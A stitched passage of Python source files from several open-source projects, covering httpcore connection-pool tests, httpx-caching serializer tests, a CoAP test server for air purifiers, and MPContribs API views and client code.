return 0x0000ff
elif byte >= 0x01:
return 0xffff00
else:
return 0xffffff
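    # Added summary of the mapping above: 0x00 -> white, 0x01-0x1F -> yellow (control bytes),
    # 0x20-0x7F -> blue (printable ASCII range), 0x80-0xFF -> black.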
def fill_image(input_data, image, image_size):
"""Puts color pixels on an image with color conversion"""
y_range = range(image_size[1])
x_range = range(IMAGE_WIDTH)
d_range = len(input_data)
pix = image.load()
index = 0
for y in y_range:
for x in x_range:
pix[x, y] = convert_color(input_data[index])
index += 1
if index >= d_range:
return
return
fill_image(input_data, image, image_size)
image.convert("P").save(input_file_name + ".png", "PNG")
return
if __name__ == "__main__":
main(sys.argv, len(sys.argv))
``` |
{
"source": "johtso/httpcore",
"score": 2
} |
#### File: tests/sync_tests/test_connection_pool.py
```python
from typing import Iterator, Tuple
import pytest
import httpcore
from httpcore._async.base import ConnectionState
from httpcore._types import URL, Headers
class MockConnection(object):
def __init__(self, http_version):
self.origin = (b"http", b"example.org", 80)
self.state = ConnectionState.PENDING
self.is_http11 = http_version == "HTTP/1.1"
self.is_http2 = http_version == "HTTP/2"
self.stream_count = 0
def request(
self,
method: bytes,
url: URL,
headers: Headers = None,
stream: httpcore.SyncByteStream = None,
ext: dict = None,
) -> Tuple[int, Headers, httpcore.SyncByteStream, dict]:
self.state = ConnectionState.ACTIVE
self.stream_count += 1
def on_close():
self.stream_count -= 1
if self.stream_count == 0:
self.state = ConnectionState.IDLE
def iterator() -> Iterator[bytes]:
yield b""
stream = httpcore.IteratorByteStream(
iterator=iterator(), close_func=on_close
)
return 200, [], stream, {}
def close(self):
pass
def info(self) -> str:
return str(self.state)
def mark_as_ready(self) -> None:
self.state = ConnectionState.READY
def is_connection_dropped(self) -> bool:
return False
class ConnectionPool(httpcore.SyncConnectionPool):
def __init__(self, http_version: str):
super().__init__()
self.http_version = http_version
assert http_version in ("HTTP/1.1", "HTTP/2")
def _create_connection(self, **kwargs):
return MockConnection(self.http_version)
def read_body(stream: httpcore.SyncByteStream) -> bytes:
try:
body = []
for chunk in stream:
body.append(chunk)
return b"".join(body)
finally:
stream.close()
@pytest.mark.parametrize("http_version", ["HTTP/1.1", "HTTP/2"])
def test_sequential_requests(http_version) -> None:
with ConnectionPool(http_version=http_version) as http:
info = http.get_connection_info()
assert info == {}
response = http.request(b"GET", (b"http", b"example.org", None, b"/"))
status_code, headers, stream, ext = response
info = http.get_connection_info()
assert info == {"http://example.org": ["ConnectionState.ACTIVE"]}
read_body(stream)
info = http.get_connection_info()
assert info == {"http://example.org": ["ConnectionState.IDLE"]}
response = http.request(b"GET", (b"http", b"example.org", None, b"/"))
status_code, headers, stream, ext = response
info = http.get_connection_info()
assert info == {"http://example.org": ["ConnectionState.ACTIVE"]}
read_body(stream)
info = http.get_connection_info()
assert info == {"http://example.org": ["ConnectionState.IDLE"]}
def test_concurrent_requests_h11() -> None:
with ConnectionPool(http_version="HTTP/1.1") as http:
info = http.get_connection_info()
assert info == {}
response_1 = http.request(b"GET", (b"http", b"example.org", None, b"/"))
status_code_1, headers_1, stream_1, ext_1 = response_1
info = http.get_connection_info()
assert info == {"http://example.org": ["ConnectionState.ACTIVE"]}
response_2 = http.request(b"GET", (b"http", b"example.org", None, b"/"))
status_code_2, headers_2, stream_2, ext_2 = response_2
info = http.get_connection_info()
assert info == {
"http://example.org": ["ConnectionState.ACTIVE", "ConnectionState.ACTIVE"]
}
read_body(stream_1)
info = http.get_connection_info()
assert info == {
"http://example.org": ["ConnectionState.ACTIVE", "ConnectionState.IDLE"]
}
read_body(stream_2)
info = http.get_connection_info()
assert info == {
"http://example.org": ["ConnectionState.IDLE", "ConnectionState.IDLE"]
}
def test_concurrent_requests_h2() -> None:
with ConnectionPool(http_version="HTTP/2") as http:
info = http.get_connection_info()
assert info == {}
response_1 = http.request(b"GET", (b"http", b"example.org", None, b"/"))
status_code_1, headers_1, stream_1, ext_1 = response_1
info = http.get_connection_info()
assert info == {"http://example.org": ["ConnectionState.ACTIVE"]}
response_2 = http.request(b"GET", (b"http", b"example.org", None, b"/"))
status_code_2, headers_2, stream_2, ext_2 = response_2
info = http.get_connection_info()
assert info == {"http://example.org": ["ConnectionState.ACTIVE"]}
read_body(stream_1)
info = http.get_connection_info()
assert info == {"http://example.org": ["ConnectionState.ACTIVE"]}
read_body(stream_2)
info = http.get_connection_info()
assert info == {"http://example.org": ["ConnectionState.IDLE"]}
``` |
{
"source": "johtso/httpx-caching",
"score": 2
} |
#### File: httpx-caching/tests/test_serialization.py
```python
import msgpack
from httpx_caching._models import Response
from httpx_caching._serializer import Serializer
class TestSerializer(object):
def setup(self):
self.serializer = Serializer()
self.response_data = {
"response": {
"body": b"Hello World",
"headers": {
"Content-Type": "text/plain",
"Expires": "87654",
"Cache-Control": "public",
},
"status_code": 200,
"extensions": {},
},
"vary": {},
}
def test_read_version_v0(self):
resp, _vary_fields = self.serializer._loads_v0(
msgpack.dumps(self.response_data)
)
assert resp.stream.read() == b"Hello World"
def test_dumps(self):
assert self.serializer.dumps(
Response.from_raw((200, {}, b"foo", {})),
{},
b"foo",
)
``` |
{
"source": "johtso/py-air-control",
"score": 2
} |
#### File: py-air-control/testing/coap_test_server.py
```python
from threading import Thread
import time
from coapthon.server.coap import CoAP
from coapthon.client.helperclient import HelperClient
from coapthon.resources.resource import Resource
from coapthon import defines
class CoAPTestServer:
def __init__(self, port):
super().__init__()
self.coap_server = CoAP(("127.0.0.1", port))
self.client = HelperClient(server=("127.0.0.1", port))
self.add_url_rule("testCoapIsAlive", CoapTestResource())
self.thread = Thread(target=self._run)
def _test_connection(self):
try:
request = self.client.mk_request(defines.Codes.GET, "testCoapIsAlive")
response = self.client.send_request(request, None, 2)
if response.payload == "success":
return True
else:
return False
except Exception as e:
return True
def _run(self):
self.coap_server.listen(5)
def start(self):
self.thread.start()
while not self._test_connection():
time.sleep(1)
def stop(self):
self.coap_server.close()
self.client.close()
self.thread.join(5)
def add_url_rule(self, path, resource):
assert isinstance(resource, Resource)
path = path.strip("/")
paths = path.split("/")
actual_path = ""
i = 0
for p in paths:
i += 1
actual_path += "/" + p
try:
res = self.coap_server.root[actual_path]
except KeyError:
res = None
if res is None:
resource.path = actual_path
self.coap_server.root[actual_path] = resource
# TODO: Code can be removed after Coapthon3 > 1.01 is ready and imported, add code below instead
# self.coap_server.add_resource(rule, resource)
class CoapTestResource(Resource):
def __init__(self, name="CoapTestResource"):
super(CoapTestResource, self).__init__(name)
self.payload = "success"
def render_GET(self, request):
return self
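# Hypothetical usage sketch (added for illustration; it mirrors how test_coap.py further
# below drives this helper and is not part of the original module). StatusResource comes
# from the sibling plain_coap_resources module shown next.
if __name__ == "__main__":
    from plain_coap_resources import StatusResource
    demo_server = CoAPTestServer(5683)
    demo_server.add_url_rule("/sys/dev/status", StatusResource())
    demo_server.start()  # waits until the built-in "testCoapIsAlive" resource responds
    try:
        pass  # exercise a CoAP client against coap://127.0.0.1:5683 here
    finally:
        demo_server.stop()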
```
#### File: py-air-control/testing/plain_coap_resources.py
```python
import os
import json
from coapthon.resources.resource import Resource
class StatusResource(Resource):
def __init__(self, name="StatusResource"):
super(StatusResource, self).__init__(name)
self.dataset = None
self.test_data = self._test_data()
self.content_type = "application/json"
def _test_data(self):
dir_path = os.path.dirname(os.path.realpath(__file__))
with open(os.path.join(dir_path, "data.json"), "r") as json_file:
return json.load(json_file)
def set_dataset(self, dataset):
self.dataset = dataset
def render_GET_advanced(self, request, response):
if self.dataset is None:
raise Exception("StatusResource: set dataset before running tests")
response.payload = '{{"state":{{"reported": {} }} }}'.format(
self.test_data["plain-coap"][self.dataset]["data"]
)
return self, response
class ControlResource(Resource):
def __init__(self, name="ControlResource"):
super(ControlResource, self).__init__(name)
self.content_type = "application/json"
self.data = []
def append_data(self, data):
self.data.append(data)
def render_POST_advanced(self, request, response):
        if len(self.data) == 0:
raise Exception("ControlResource: set data before running tests")
change_request = json.loads(request.payload)["state"]["desired"]
success = "failed"
for data in self.data:
if json.loads(data) == change_request:
success = "success"
break
response.payload = '{{"status":"{}"}}'.format(success)
return self, response
```
#### File: py-air-control/testing/test_coap.py
```python
import os
import json
import pytest
from pyairctrl.coap_client import CoAPAirClient
from pyairctrl.airctrl import CoAPCli
from coap_test_server import CoAPTestServer
from coap_resources import SyncResource, ControlResource, StatusResource
class TestCoap:
@pytest.fixture(scope="class")
def air_client(self):
return CoAPAirClient("127.0.0.1")
@pytest.fixture(scope="class")
def air_cli(self):
return CoAPCli("127.0.0.1")
@pytest.fixture(scope="class")
def test_data(self):
return self._test_data()
def _test_data(self):
dir_path = os.path.dirname(os.path.realpath(__file__))
with open(os.path.join(dir_path, "data.json"), "r") as json_file:
return json.load(json_file)
@pytest.fixture(scope="class")
def sync_resource(self):
return SyncResource()
@pytest.fixture(scope="class")
def status_resource(self):
return StatusResource()
@pytest.fixture(scope="class")
def control_resource(self):
return ControlResource()
@pytest.fixture(autouse=True)
def set_defaults(self, sync_resource, control_resource, status_resource):
control_resource.set_data(
'{"CommandType": "app", "DeviceId": "", "EnduserId": "", "mode": "A"}'
)
status_resource.set_dataset("status")
status_resource.set_encryption_key(sync_resource.encryption_key)
status_resource.set_render_callback(None)
@pytest.fixture(scope="class", autouse=True)
def coap_server(self, sync_resource, status_resource, control_resource):
server = CoAPTestServer(5683)
server.add_url_rule("/sys/dev/status", status_resource)
server.add_url_rule("/sys/dev/control", control_resource)
server.add_url_rule("/sys/dev/sync", sync_resource)
server.start()
yield server
server.stop()
def test_sync_was_called(self, air_client):
assert air_client.client_key == SyncResource.SYNC_KEY
def test_set_values(self, air_client):
values = {}
values["mode"] = "A"
result = air_client.set_values(values)
assert result
def test_key_is_increased(self, control_resource):
air_client = CoAPAirClient("127.0.0.1")
values = {}
values["mode"] = "A"
result = air_client.set_values(values)
assert (
int(control_resource.encoded_counter, 16)
== int(SyncResource.SYNC_KEY, 16) + 1
)
def test_response_is_cut_off_should_return_error(self, status_resource, capfd):
air_client = CoAPAirClient("127.0.0.1")
status_resource.set_render_callback(self.cutoff_data)
air_client.get_status()
result, err = capfd.readouterr()
assert "Message from device got corrupted" in result
def cutoff_data(self, data):
return data[:-8]
def test_get_status_is_valid(
self, sync_resource, status_resource, air_client, test_data
):
self.assert_json_data(
air_client.get_status,
"status",
test_data,
air_client,
sync_resource,
status_resource,
)
def test_get_status_longsize_is_valid(
self, sync_resource, status_resource, air_client, test_data
):
dataset = "status-longsize"
status_resource.set_dataset(dataset)
self.assert_json_data(
air_client.get_status,
dataset,
test_data,
air_client,
sync_resource,
status_resource,
)
def test_get_firmware_is_valid(
self, sync_resource, status_resource, air_client, test_data
):
self.assert_json_data(
air_client.get_firmware,
"status",
test_data,
air_client,
sync_resource,
status_resource,
)
def test_get_filters_is_valid(
self, sync_resource, status_resource, air_client, test_data
):
self.assert_json_data(
air_client.get_filters,
"status",
test_data,
air_client,
sync_resource,
status_resource,
)
def test_get_cli_status_is_valid(
self, sync_resource, status_resource, air_cli, test_data, capfd
):
self.assert_cli_data(
air_cli.get_status,
"status-cli",
test_data,
air_cli,
capfd,
sync_resource,
status_resource,
)
def test_get_cli_status_for_AC3858_is_valid(
self, sync_resource, status_resource, air_cli, test_data, capfd
):
dataset = "status-AC3858"
status_resource.set_dataset(dataset)
self.assert_cli_data(
air_cli.get_status,
"{}-cli".format(dataset),
test_data,
air_cli,
capfd,
sync_resource,
status_resource,
)
def test_get_cli_status_err193_is_valid(
self, sync_resource, status_resource, air_cli, test_data, capfd
):
dataset = "status-err193"
status_resource.set_dataset(dataset)
self.assert_cli_data(
air_cli.get_status,
"{}-cli".format(dataset),
test_data,
air_cli,
capfd,
sync_resource,
status_resource,
)
def test_get_cli_firmware_is_valid(
self, sync_resource, status_resource, air_cli, test_data, capfd
):
self.assert_cli_data(
air_cli.get_firmware,
"firmware-cli",
test_data,
air_cli,
capfd,
sync_resource,
status_resource,
)
def test_get_cli_filters_is_valid(
self, sync_resource, status_resource, air_cli, test_data, capfd
):
self.assert_cli_data(
air_cli.get_filters,
"fltsts-cli",
test_data,
air_cli,
capfd,
sync_resource,
status_resource,
)
def assert_json_data(
self, air_func, dataset, test_data, air_client, sync_resource, status_resource
):
result = air_func()
data = test_data["coap"][dataset]["data"]
json_data = json.loads(data)
assert result == json_data
def assert_cli_data(
self,
air_func,
dataset,
test_data,
air_cli,
capfd,
sync_resource,
status_resource,
):
air_func()
result, err = capfd.readouterr()
assert result == test_data["coap"][dataset]["data"]
``` |
{
"source": "johuck/MPContribs",
"score": 2
} |
#### File: api/contributions/views.py
```python
import re
import os
from collections import defaultdict
import flask_mongorest
from flask import Blueprint
from flask_mongorest.resources import Resource
from flask_mongorest import operators as ops
from flask_mongorest.methods import *
from flask_mongorest.exceptions import UnknownFieldError
from mpcontribs.api.core import SwaggerView
from mpcontribs.api.contributions.document import Contributions
from mpcontribs.api.structures.document import Structures
from mpcontribs.api.tables.document import Tables
templates = os.path.join(os.path.dirname(flask_mongorest.__file__), "templates")
contributions = Blueprint("contributions", __name__, template_folder=templates)
exclude = r'[^$.\s_~`^&(){}[\]\\;\'"/]'
class ContributionsResource(Resource):
document = Contributions
filters = {
"id": [ops.In, ops.Exact],
"project": [ops.In, ops.Exact],
"identifier": [ops.In, ops.Contains, ops.Exact],
"formula": [ops.In, ops.Contains, ops.Exact],
"is_public": [ops.Boolean],
"last_modified": [ops.Gte, ops.Lte],
re.compile(r"^data__((?!__).)*$"): [ops.Contains, ops.Gte, ops.Lte],
}
fields = ["id", "project", "identifier", "formula", "is_public", "last_modified"]
allowed_ordering = [
"id",
"project",
"identifier",
"formula",
"is_public",
"last_modified",
re.compile(r"^data(__(" + exclude + ")+){1,3}$"),
]
paginate = True
default_limit = 20
max_limit = 250
download_formats = ["json", "csv"]
@staticmethod
def get_optional_fields():
return ["data", "structures", "tables"]
def value_for_field(self, obj, field):
if not field.startswith("structures") and not field.startswith("tables"):
raise UnknownFieldError
field_split = field.split(".")
field_len = len(field_split)
if field_len > 2:
raise UnknownFieldError
# add structures and tables info to response if requested
from mpcontribs.api.structures.views import StructuresResource
from mpcontribs.api.tables.views import TablesResource
mask = ["id", "label", "name"]
# return full structures/tables only if download requested
full = bool(
self.view_method == Download and self.params.get("_fields") == "_all"
)
fmt = self.params.get("format")
kwargs = dict(contribution=obj.id)
if field_len == 2:
# requested structure/table(s) for specific label
kwargs["label"] = field_split[1]
if field.startswith("structures"):
res = StructuresResource(view_method=self.view_method)
if full and fmt == "json":
mask += ["lattice", "sites", "charge", "klass", "module"]
objects = Structures.objects.only(*mask)
else:
res = TablesResource(view_method=self.view_method)
# TODO adjust mask for full json format
objects = Tables.objects.only(*mask)
objects = objects.filter(**kwargs).order_by("-id")
result = defaultdict(list)
for o in objects:
os = res.serialize(o, fields=mask)
# TODO res.value_for_field(o, "cif") if fmt == "csv" and field.startswith("structures")
result[os.pop("label")].append(os)
ret = result if field_len == 1 else list(result.values())[0]
obj.update(**{f"set__{field.replace('.', '__')}": ret})
return ret
class ContributionsView(SwaggerView):
resource = ContributionsResource
methods = [
Fetch,
Delete,
Update,
BulkFetch,
BulkCreate,
BulkUpdate,
BulkDelete,
Download,
]
```
#### File: mpcontribs/api/core.py
```python
import os
import logging
import yaml
from typing import Pattern
from importlib import import_module
from flask.views import MethodViewType
from flasgger.marshmallow_apispec import SwaggerView as OriginalSwaggerView
from marshmallow_mongoengine import ModelSchema
from flask_mongorest.views import ResourceView
from mongoengine.queryset.visitor import Q
from werkzeug.exceptions import Unauthorized
from mpcontribs.api.config import SWAGGER
logger = logging.getLogger("app")
def get_specs(klass, method, collection):
method_name = (
method.__name__ if getattr(method, "__name__", None) is not None else method
)
default_response = {
"description": "Error",
"schema": {"type": "object", "properties": {"error": {"type": "string"}}},
}
fields_param = None
if klass.resource.fields is not None:
fields_avail = (
klass.resource.fields + klass.resource.get_optional_fields() + ["_all"]
)
description = f"List of fields to include in response ({fields_avail})."
description += " Use dot-notation for nested subfields."
fields_param = {
"name": "_fields",
"in": "query",
"default": klass.resource.fields,
"type": "array",
"items": {"type": "string"},
"description": description,
}
field_pagination_params = []
for field, limits in klass.resource.fields_to_paginate.items():
field_pagination_params.append(
{
"name": f"{field}_page",
"in": "query",
"default": 1,
"type": "integer",
"description": f"page to retrieve for {field} field",
}
)
field_pagination_params.append(
{
"name": f"{field}_per_page",
"in": "query",
"default": limits[0],
"maximum": limits[1],
"type": "integer",
"description": f"number of items to retrieve per page for {field} field",
}
)
limit_params = [
{
"name": "_skip",
"in": "query",
"type": "integer",
"description": "number of items to skip",
},
{
"name": "_limit",
"in": "query",
"type": "integer",
"description": "maximum number of items to return",
},
{
"name": "page",
"in": "query",
"type": "integer",
"description": "page number to return (in batches of `per_page/_limit`; alternative to `_skip`)",
},
{
"name": "per_page",
"in": "query",
"type": "integer",
"description": "maximum number of items to return per page (same as `_limit`)",
},
]
filter_params = []
if getattr(klass.resource, "filters", None) is not None:
for k, v in klass.resource.filters.items():
label = k.pattern if isinstance(k, Pattern) else k
for op in v:
filter_params.append(
{
"name": label if op.op == "exact" else f"{label}__{op.op}",
"in": "query",
"type": op.typ,
"description": f"filter {label}"
if op.op == "exact"
else f"filter {label} via ${op.op}",
}
)
if op.typ == "array":
filter_params[-1]["items"] = {"type": "string"}
order_params = []
if klass.resource.allowed_ordering:
allowed_ordering = [
o.pattern if isinstance(o, Pattern) else o
for o in klass.resource.allowed_ordering
]
order_params = [
{
"name": "_order_by",
"in": "query",
"type": "string",
"description": f"order {collection} via {allowed_ordering}",
},
{
"name": "order",
"in": "query",
"type": "string",
"description": f"order {collection} *asc* or *desc*",
},
]
spec = None
if method_name == "Fetch":
params = [
{
"name": "pk",
"in": "path",
"type": "string",
"required": True,
"description": f"{collection[:-1]} (primary key)",
}
]
if fields_param is not None:
params.append(fields_param)
params += field_pagination_params
spec = {
"summary": f"Retrieve a {collection[:-1]}.",
"operationId": "get_entry",
"parameters": params,
"responses": {
200: {
"description": f"single {collection} entry",
"schema": {"$ref": f"#/definitions/{klass.schema_name}"},
},
"default": default_response,
},
}
elif method_name == "BulkFetch":
params = [fields_param] if fields_param is not None else []
params += field_pagination_params
params += order_params
params += filter_params
schema_props = {
"data": {
"type": "array",
"items": {"$ref": f"#/definitions/{klass.schema_name}"},
}
}
if klass.resource.paginate:
schema_props["has_more"] = {"type": "boolean"}
schema_props["total_count"] = {"type": "integer"}
schema_props["total_pages"] = {"type": "integer"}
params += limit_params
spec = {
"summary": f"Filter and retrieve {collection}.",
"operationId": "get_entries",
"parameters": params,
"responses": {
200: {
"description": f"list of {collection}",
"schema": {"type": "object", "properties": schema_props},
},
"default": default_response,
},
}
elif method_name == "Download":
params = [
{
"name": "short_mime",
"in": "path",
"type": "string",
"required": True,
"description": f"MIME Download Type: gz",
"default": "gz",
},
{
"name": "format",
"in": "query",
"type": "string",
"required": True,
"description": f"download {collection} in different formats: {klass.resource.download_formats}",
},
]
params += [fields_param] if fields_param is not None else []
params += order_params
params += filter_params
spec = {
"summary": f"Filter and download {collection}.",
"operationId": "download_entries",
"parameters": params,
"produces": ["application/gzip"],
"responses": {
200: {
"description": f"{collection} download",
"schema": {"type": "file"},
},
"default": default_response,
},
}
elif method_name == "Create":
spec = {
"summary": f"Create a new {collection[:-1]}.",
"operationId": "create_entry",
"parameters": [
{
"name": f"{collection[:-1]}",
"in": "body",
"description": f"The object to use for {collection[:-1]} creation",
"schema": {"$ref": f"#/definitions/{klass.schema_name}"},
}
],
"responses": {
200: {
"description": f"{collection[:-1]} created",
"schema": {"$ref": f"#/definitions/{klass.schema_name}"},
},
"default": default_response,
},
}
elif method_name == "BulkCreate":
spec = {
"summary": f"Create new {collection[:-1]}(s).",
"operationId": "create_entries",
"parameters": [
{
"name": f"{collection}",
"in": "body",
"description": f"The objects to use for {collection[:-1]} creation",
"schema": {
"type": "array",
"items": {"$ref": f"#/definitions/{klass.schema_name}"},
},
}
],
"responses": {
200: {
"description": f"{collection} created",
"schema": {
"type": "object",
"properties": {
"count": {"type": "integer"},
"data": {
"type": "array",
"items": {"$ref": f"#/definitions/{klass.schema_name}"},
},
},
},
},
"default": default_response,
},
}
elif method_name == "Update":
spec = {
"summary": f"Update a {collection[:-1]}.",
"operationId": "update_entry",
"parameters": [
{
"name": "pk",
"in": "path",
"type": "string",
"required": True,
"description": f"The {collection[:-1]} (primary key) to update",
},
{
"name": f"{collection[:-1]}",
"in": "body",
"description": f"The object to use for {collection[:-1]} update",
"schema": {"type": "object"},
},
],
"responses": {
200: {
"description": f"{collection[:-1]} updated",
"schema": {"$ref": f"#/definitions/{klass.schema_name}"},
},
"default": default_response,
},
}
elif method_name == "BulkUpdate":
params = filter_params
params.append(
{
"name": f"{collection}",
"in": "body",
"description": f"The object to use for {collection} bulk update",
"schema": {"type": "object"},
}
)
schema_props = {"count": {"type": "integer"}}
if klass.resource.paginate:
schema_props["has_more"] = {"type": "boolean"}
schema_props["total_count"] = {"type": "integer"}
schema_props["total_pages"] = {"type": "integer"}
params += limit_params
spec = {
"summary": f"Filter and update {collection}.",
"operationId": "update_entries",
"parameters": params,
"responses": {
200: {
"description": f"Number of {collection} updated",
"schema": {"type": "object", "properties": schema_props},
},
"default": default_response,
},
}
elif method_name == "BulkDelete":
params = filter_params
schema_props = {"count": {"type": "integer"}}
if klass.resource.paginate:
schema_props["has_more"] = {"type": "boolean"}
schema_props["total_count"] = {"type": "integer"}
schema_props["total_pages"] = {"type": "integer"}
params += limit_params
spec = {
"summary": f"Filter and delete {collection}.",
"operationId": "delete_entries",
"parameters": params,
"responses": {
200: {
"description": f"Number of {collection} deleted",
"schema": {"type": "object", "properties": schema_props},
},
"default": default_response,
},
}
elif method_name == "Delete":
spec = {
"summary": f"Delete a {collection[:-1]}.",
"operationId": "delete_entry",
"parameters": [
{
"name": "pk",
"in": "path",
"type": "string",
"required": True,
"description": f"The {collection[:-1]} (primary key) to delete",
}
],
"responses": {
200: {"description": f"{collection[:-1]} deleted"},
"default": default_response,
},
}
return spec
# https://github.com/pallets/flask/blob/master/flask/views.py
class SwaggerViewType(MethodViewType):
"""Metaclass for `SwaggerView` defining custom attributes"""
def __init__(cls, name, bases, d):
"""initialize Schema, decorators, definitions, and tags"""
super(SwaggerViewType, cls).__init__(name, bases, d)
if not __name__ == cls.__module__:
# e.g.: cls.__module__ = mpcontribs.api.projects.views
views_path = cls.__module__.split(".")
doc_path = ".".join(views_path[:-1] + ["document"])
cls.tags = [views_path[-2]]
doc_filepath = doc_path.replace(".", os.sep) + ".py"
if os.path.exists(doc_filepath):
cls.doc_name = cls.tags[0].capitalize()
Model = getattr(import_module(doc_path), cls.doc_name)
cls.schema_name = cls.doc_name + "Schema"
cls.Schema = type(
cls.schema_name,
(ModelSchema, object),
{
"Meta": type(
"Meta",
(object,),
dict(model=Model, ordered=True, model_build_obj=False),
)
},
)
cls.definitions = {cls.schema_name: cls.Schema}
cls.resource.schema = cls.Schema
# write flask-mongorest swagger specs
for method in cls.methods:
spec = get_specs(cls, method, cls.tags[0])
if spec:
dir_path = os.path.join(SWAGGER["doc_dir"], cls.tags[0])
file_path = os.path.join(dir_path, method.__name__ + ".yml")
if not os.path.exists(file_path):
os.makedirs(dir_path, exist_ok=True)
with open(file_path, "w") as f:
yaml.dump(spec, f)
logger.warning(
f"{cls.tags[0]}.{method.__name__} written to {file_path}"
)
class SwaggerView(OriginalSwaggerView, ResourceView, metaclass=SwaggerViewType):
"""A class-based view defining additional methods"""
def get_groups(self, request):
groups = request.headers.get("X-Consumer-Groups")
return [] if groups is None else groups.split(",")
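    # Illustration (hypothetical group name): a header "X-Consumer-Groups: admin,my_project"
    # yields ["admin", "my_project"]; a missing header yields [].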
def is_admin_or_project_user(self, request, obj):
groups = self.get_groups(request)
if hasattr(obj, "is_approved"):
is_approved = obj.is_approved
owner = obj.owner
project = obj.project
elif hasattr(obj, "project"):
is_approved = obj.project.is_approved
owner = obj.project.owner
project = obj.project.id
else:
is_approved = obj.contribution.project.is_approved
owner = obj.contribution.project.owner
project = obj.contribution.project.id
username = request.headers.get("X-Consumer-Username")
return "admin" in groups or (
(project in groups or owner == username) and is_approved
)
def has_read_permission(self, request, qs):
groups = self.get_groups(request)
if "admin" in groups:
return qs # admins can read all entries
# only read public or approved project entries
username = request.headers.get("X-Consumer-Username")
qfilter = Q(is_public=True)
if groups:
qfilter |= Q(project__in=groups, is_approved=True)
if username:
qfilter |= Q(owner=username, is_approved=True)
if request.path.startswith("/projects/"):
return qs.filter(qfilter)
# project or contribution are LazyReferenceFields (multiple queries)
module = import_module("mpcontribs.api.projects.document")
Projects = getattr(module, "Projects")
projects = Projects.objects.only("project").filter(qfilter)
qfilter = Q(is_public=True) | Q(project__in=projects)
if not request.path.startswith("/contributions/"):
module = import_module("mpcontribs.api.contributions.document")
Contributions = getattr(module, "Contributions")
contributions = Contributions.objects.only("id").filter(qfilter)
qfilter = Q(is_public=True) | Q(contribution__in=contributions)
return qs.filter(qfilter)
def has_add_permission(self, request, obj):
if not self.is_admin_or_project_user(request, obj):
return False
if hasattr(obj, "identifier") and obj.project.unique_identifiers:
if self.resource.document.objects(
project=obj.project.id, identifier=obj.identifier
).count():
raise Unauthorized(
f"{obj.identifier} already added for {obj.project.id}"
)
return True
def has_change_permission(self, request, obj):
return self.is_admin_or_project_user(request, obj)
def has_delete_permission(self, request, obj):
return self.is_admin_or_project_user(request, obj)
```
#### File: mpcontribs/client/__init__.py
```python
import os
import fido
import warnings
import pandas as pd
from pyisemail import is_email
from pyisemail.diagnosis import BaseDiagnosis
from swagger_spec_validator.common import SwaggerValidationError
from bravado_core.formatter import SwaggerFormat
from bravado.client import SwaggerClient
from bravado.fido_client import FidoClient # async
from bravado.http_future import HttpFuture
from bravado.swagger_model import Loader
from bravado.config import bravado_config_from_config_dict
from bravado_core.spec import Spec
from json2html import Json2Html
from IPython.display import display, HTML
from boltons.iterutils import remap
from pymatgen import Structure
DEFAULT_HOST = "api.mpcontribs.org"
HOST = os.environ.get("MPCONTRIBS_API_HOST", DEFAULT_HOST)
BULMA = "is-bordered is-striped is-narrow is-hoverable is-fullwidth"
j2h = Json2Html()
pd.options.plotting.backend = "plotly"
warnings.formatwarning = lambda msg, *args, **kwargs: f"{msg}\n"
warnings.filterwarnings("default", category=DeprecationWarning, module=__name__)
def validate_email(email_string):
d = is_email(email_string, diagnose=True)
if d > BaseDiagnosis.CATEGORIES["VALID"]:
raise SwaggerValidationError(f"{email_string} {d.message}")
email_format = SwaggerFormat(
format="email",
to_wire=str,
to_python=str,
validate=validate_email,
description="e-mail address",
)
class FidoClientGlobalHeaders(FidoClient):
def __init__(self, headers=None):
super().__init__()
self.headers = headers or {}
def request(self, request_params, operation=None, request_config=None):
request_for_twisted = self.prepare_request_for_twisted(request_params)
request_for_twisted["headers"].update(self.headers)
future_adapter = self.future_adapter_class(fido.fetch(**request_for_twisted))
return HttpFuture(
future_adapter, self.response_adapter_class, operation, request_config
)
def visit(path, key, value):
if isinstance(value, dict) and "display" in value:
return key, value["display"]
return key not in ["value", "unit"]
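# Illustration (hypothetical key/values): with the `visit` hook above, boltons' remap
# collapses nested quantity dicts to their display string and drops raw "value"/"unit"
# entries, e.g. {"band_gap": {"display": "1.2 eV", "value": 1.2, "unit": "eV"}}
# is rendered as {"band_gap": "1.2 eV"}.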
class Dict(dict):
def pretty(self, attrs=f'class="table {BULMA}"'):
return display(
HTML(j2h.convert(json=remap(self, visit=visit), table_attributes=attrs))
)
def load_client(apikey=None, headers=None, host=HOST):
    warnings.warn(
        "load_client(...) is deprecated, use Client(...) instead", DeprecationWarning
    )
    # assumed completion: hand back the new-style client so the deprecated helper stays usable
    return Client(apikey=apikey, headers=headers, host=host)
# TODO data__ regex doesn't work through bravado/swagger client
class Client(SwaggerClient):
"""client to connect to MPContribs API
We only want to load the swagger spec from the remote server when needed and not everytime the
client is initialized. Hence using the Borg design nonpattern (instead of Singleton): Since the
__dict__ of any instance can be re-bound, Borg rebinds it in its __init__ to a class-attribute
dictionary. Now, any reference or binding of an instance attribute will actually affect all
instances equally.
"""
_shared_state = {}
def __init__(self, apikey=None, headers=None, host=HOST):
# - Kong forwards consumer headers when api-key used for auth
# - forward consumer headers when connecting through localhost
self.__dict__ = self._shared_state
self.apikey = apikey
self.headers = {"x-api-key": apikey} if apikey else headers
self.host = host
if "swagger_spec" not in self.__dict__ or (
self.headers is not None
and self.swagger_spec.http_client.headers != self.headers
):
http_client = FidoClientGlobalHeaders(headers=self.headers)
loader = Loader(http_client)
protocol = "https" if self.apikey else "http"
origin_url = f"{protocol}://{self.host}/apispec.json"
spec_dict = loader.load_spec(origin_url)
spec_dict["host"] = self.host
spec_dict["schemes"] = [protocol]
config = {
"validate_responses": False,
"use_models": False,
"include_missing_properties": False,
"formats": [email_format],
}
bravado_config = bravado_config_from_config_dict(config)
for key in set(bravado_config._fields).intersection(set(config)):
del config[key]
config["bravado"] = bravado_config
swagger_spec = Spec.from_dict(spec_dict, origin_url, http_client, config)
super().__init__(
swagger_spec, also_return_response=bravado_config.also_return_response
)
def get_project(self, project):
"""Convenience function to get full project entry and display as HTML table"""
return Dict(self.projects.get_entry(pk=project, _fields=["_all"]).result())
def get_contribution(self, cid):
"""Convenience function to get full contribution entry and display as HTML table"""
return Dict(self.contributions.get_entry(pk=cid, _fields=["_all"]).result())
def get_table(self, tid):
"""Convenience function to get full Pandas DataFrame for a table."""
page, pages = 1, None
table = {"data": []}
while pages is None or page <= pages:
res = self.tables.get_entry(
pk=tid, _fields=["_all"], data_page=page, data_per_page=1000
).result()
if "columns" not in table:
pages = res["total_data_pages"]
table["columns"] = res["columns"]
table["data"].extend(res["data"])
page += 1
return pd.DataFrame.from_records(
